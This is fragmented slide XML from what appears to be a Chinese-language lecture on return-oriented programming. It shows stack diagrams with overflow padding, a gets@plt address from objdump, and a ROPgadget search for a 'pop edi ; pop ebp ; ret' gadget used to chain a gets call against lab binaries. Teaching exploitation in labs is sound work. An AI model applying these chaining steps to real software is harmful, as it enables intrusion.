bl, dh ; ret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0x08048541 : add byte ptr [eax], al ; add byte ptr [eax], al ; add byte ptr [eax], al ; ret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ret ; ret ; ret"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5325329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ret ; ret ; ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1549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550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551" name="After you can control EIP &amp; stack"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835705" y="7160339"/>
            <a:ext cx="936530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60947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>After you can control EIP &amp; stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1552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0x61616161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2600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0x61616161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553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54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55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56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57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58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59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60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61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62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563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564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565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566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67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68" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="89446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569" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="9782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570" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="106210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571" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="639149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572" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="722969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573" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="806789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574" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20902620" y="600794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sp>
        <p:nvSpPr>
          <p:cNvPr id="1575" name="esp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15071391" y="6007940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esp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1576" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16026320" y="6326710"/>
            <a:ext cx="1078458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77" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="5591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aaaa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ret ; ret ; ret"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5325329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ret ; ret ; ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1580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581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1582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0x61616161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2600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0x08048330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583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4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5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6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7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8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9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0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1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2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593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594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595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596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7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8" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="89446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599" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="9782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600" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="106210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601" name="0x080484aa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17699451" y="6391499"/>
            <a:ext cx="262119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42192"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumOff val="-10627"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="942192"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x080484aa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1602" name="0xf0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="7229699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0xf0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1603" name="cccc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="8067899"/>
            <a:ext cx="10185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cccc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1604" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20902620" y="600794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sp>
        <p:nvSpPr>
          <p:cNvPr id="1605" name="esp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15071391" y="6007940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esp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1606" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16026320" y="6326710"/>
            <a:ext cx="1078458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07" name="0x08048330"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17699451" y="5591889"/>
            <a:ext cx="262119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0x08048330</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1608" name="root@Ubuntu : tmp ➤ objdump -S ./bof|more…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1683483" y="6489396"/>
            <a:ext cx="8973553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objdump -S ./bof|more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./bof:     file format elf32-i386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...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FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>08048330</a:t>
            </a:r>
            <a:r>
              <a:t> &lt;gets@plt&gt;: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8048330:       ff 25 0c a0 04 08       jmp    *</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804a00c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8048336:       68 00 00 00 00          push   $0x0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1609" name="root@Ubuntu : tmp ➤ ROPgadget --binary ./easy_nx |grep &quot;: pop edi ; pop ebp ; ret&quot;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1683483" y="9278103"/>
            <a:ext cx="8973553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ROPgadget --binary ./easy_nx |grep ": pop edi ; pop ebp ; ret"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F7509D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 b="0">
                <a:solidFill>
                  <a:srgbClr val="942192"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x080484aa</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="7499"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pop edi ; pop ebp ; ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1610" name="0xf0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20908970" y="9346985"/>
            <a:ext cx="96831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0xf0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1611" name="呼叫gets@plt執行一次gets函數"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5797470" y="6050545"/>
            <a:ext cx="12776360" cy="1367791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumOff val="-10627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呼叫gets@plt執行一次gets函數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1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ret ; ret ; ret"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5325329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ret ; ret ; ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161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615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1616" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="15369880" y="1525721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0x61616161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2600"/>
                          </a:solidFill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0x080484aa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617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18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19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0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1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2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3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4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5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6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627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628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629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630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31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32" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="89446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633" name="gggg"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="9782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gggg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1634" name="gggg"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="106210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gggg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1635" name="0x080484aa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17699451" y="6391499"/>
            <a:ext cx="262119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42192"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumOff val="-10627"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="942192"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x080484aa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1636" name="0xf0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="7229699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0xf0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1637" name="cccc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="8067899"/>
            <a:ext cx="10185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cccc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1638" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20902620" y="600794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sp>
        <p:nvSpPr>
          <p:cNvPr id="1639" name="0x08048330"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17699451" y="5591889"/>
            <a:ext cx="262119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0x08048330</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1640" name="root@Ubuntu : tmp ➤ objdump -S ./bof|more…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1683483" y="6489396"/>
            <a:ext cx="8973553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objdump -S ./bof|more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./bof:     file format elf32-i386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...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chemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>08048330</a:t>
            </a:r>
            <a:r>
              <a:t> &lt;gets@plt&gt;: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8048330:       ff 25 0c a0 04 08       jmp    *</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804a00c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8048336:       68 00 00 00 00          push   $0x0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1641" name="root@Ubuntu : tmp ➤ ROPgadget --binary ./easy_nx |grep &quot;: pop edi ; pop ebp ; ret&quot;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1683483" y="9278103"/>
            <a:ext cx="8973553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ROPgadget --binary ./easy_nx |grep ": pop edi ; pop ebp ; ret"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F7509D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 b="0">
                <a:solidFill>
                  <a:srgbClr val="942192"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x080484aa</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="7499"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pop edi ; pop ebp ; ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1642" name="0xf0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20908970" y="9346985"/>
            <a:ext cx="96831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0xf0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1643" name="esp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15071391" y="6007940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esp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1644" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16026320" y="6326710"/>
            <a:ext cx="1078458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5" name="gets(0xf0)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13852374" y="9770189"/>
            <a:ext cx="213698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73FDFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>gets(0xf0)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1646" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16094118" y="10101659"/>
            <a:ext cx="942862" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="73FDF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Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13642157" y="6734440"/>
            <a:ext cx="3551522" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="531B9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49" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13642295" y="1244600"/>
            <a:ext cx="1610299" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="531B9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50" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="13689729" y="1200874"/>
            <a:ext cx="1" cy="5552005"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="531B9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51" name="ret ; ret ; ret"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5325329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ret ; ret ; ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1652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653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1654" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="15369880" y="964804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EDI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1B93"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0x080484aa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0x61616161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0xe4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2600"/>
                          </a:solidFill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0x080484aa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655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56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57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58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59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60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61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62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63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64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665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666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667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668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69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0" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="89446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671" name="0x080484aa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17699451" y="6391499"/>
            <a:ext cx="262119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1B93"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>0x080484aa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1672" name="0xf0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="7229699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0xf0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1673" name="cccc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="8067899"/>
            <a:ext cx="10185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cccc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1674" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20902620" y="600794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sp>
        <p:nvSpPr>
          <p:cNvPr id="1675" name="0x08048330"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17699451" y="5591889"/>
            <a:ext cx="262119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0x08048330</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1676" name="root@Ubuntu : tmp ➤ objdump -S ./bof|more…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1683483" y="6489396"/>
            <a:ext cx="8973553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objdump -S ./bof|more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./bof:     file format elf32-i386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...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chemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>08048330</a:t>
            </a:r>
            <a:r>
              <a:t> &lt;gets@plt&gt;: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8048330:       ff 25 0c a0 04 08       jmp    *</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804a00c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8048336:       68 00 00 00 00          push   $0x0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1677" name="root@Ubuntu : tmp ➤ ROPgadget --binary ./easy_nx |grep &quot;: pop edi ; pop ebp ; ret&quot;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1683483" y="9278103"/>
            <a:ext cx="8973553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ROPgadget --binary ./easy_nx |grep ": pop edi ; pop ebp ; ret"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F7509D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 b="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-13999"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>0x080484aa</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="531B93"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop edi</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="7499"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> ; pop ebp ; ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1678" name="0xf0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20908970" y="9346985"/>
            <a:ext cx="96831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0xf0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1679" name="esp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15077741" y="6835563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esp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1680" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16032670" y="7154333"/>
            <a:ext cx="1078458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81" name="pop edi"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14977775" y="6007940"/>
            <a:ext cx="160410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1B93"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>pop edi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1682" name="gggg"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="9782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gggg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1683" name="gggg"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="106210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gggg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Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="13689729" y="1811960"/>
            <a:ext cx="1" cy="5813905"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="FF93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86" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13650267" y="7574359"/>
            <a:ext cx="3810560" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="FF93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87" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13642295" y="1817097"/>
            <a:ext cx="1610299" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="FF93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88" name="ret ; ret ; ret"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5325329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ret ; ret ; ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1689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690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1691" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="15369880" y="964804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EDI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1B93"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0x080484aa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9300"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0xf0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0xe8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2600"/>
                          </a:solidFill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0x080484aa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692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3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4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5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6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7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8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9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00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01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702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703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704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705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06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07" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="89446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708" name="0x080484aa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17699451" y="6391499"/>
            <a:ext cx="262119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1B93"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>0x080484aa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1709" name="0xf0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="7229699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0xf0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1710" name="cccc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="8067899"/>
            <a:ext cx="10185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cccc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1711" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20902620" y="600794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sp>
        <p:nvSpPr>
          <p:cNvPr id="1712" name="0x08048330"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17699451" y="5591889"/>
            <a:ext cx="262119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0x08048330</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1713" name="root@Ubuntu : tmp ➤ objdump -S ./bof|more…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
